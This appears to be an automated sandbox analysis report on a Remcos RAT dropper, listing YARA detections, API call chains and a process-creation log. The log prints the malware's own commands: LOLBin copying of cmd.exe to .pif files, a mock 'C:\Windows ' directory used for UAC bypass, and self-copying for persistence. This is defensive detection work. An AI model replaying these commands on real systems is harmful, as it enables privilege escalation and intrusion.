Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EBDEED	21_2_02EBDEED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA6E9F	21_2_02EA6E9F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EA7C40	21_2_02EA7C40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB7DB3	21_2_02EB7DB3

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02CA894C appears 56 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C944DC appears 74 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02CA89D0 appears 45 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C946D4 appears 244 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C94860 appears 949 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02C94500 appears 33 times
Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: String function: 02D4C400 appears 45 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03202093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03234801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02E82093 appears 50 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02EB4801 appears 41 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03201E65 appears 34 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 03234E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02EB4E70 appears 54 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 02E81E65 appears 34 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: String function: 02C5894C appears 50 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: String function: 02C446D4 appears 155 times
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Code function: String function: 02C44860 appears 683 times

One or more processes crash

Source: C:\Windows\SysWOW64\colorcpl.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652

Sample file is different than original file name gathered from version info

Source: nft438A5fN.exe	Binary or memory string: OriginalFilename vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A563000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A534000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1613117060.0000000002395000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe

Uses 32bit PE files

Source: nft438A5fN.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		11_2_0321798D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		21_2_02E9798D

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02C97FD2 GetDiskFreeSpaceA,

0_2_02C97FD2

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0320F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

11_2_0320F4AF

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CA6DC8 CoCreateInstance,

0_2_02CA6DC8

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0321B539 FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_0321B539

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0321AB9E

Source: C:\Users\user\Desktop\nft438A5fN.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4280
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1376

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\24e0cc18-8175-4616-8ea9-89ad3c39c315

Jump to behavior

Source: C:\Users\user\Desktop\nft438A5fN.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\nft438A5fN.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nft438A5fN.exe	ReversingLabs: Detection: 57%
Source: nft438A5fN.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\nft438A5fN.exe

File read: C:\Users\user\Desktop\nft438A5fN.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\nft438A5fN.exe "C:\Users\user\Desktop\nft438A5fN.exe"
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown	Process created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
Source: unknown	Process created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o	Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe	Jump to behavior
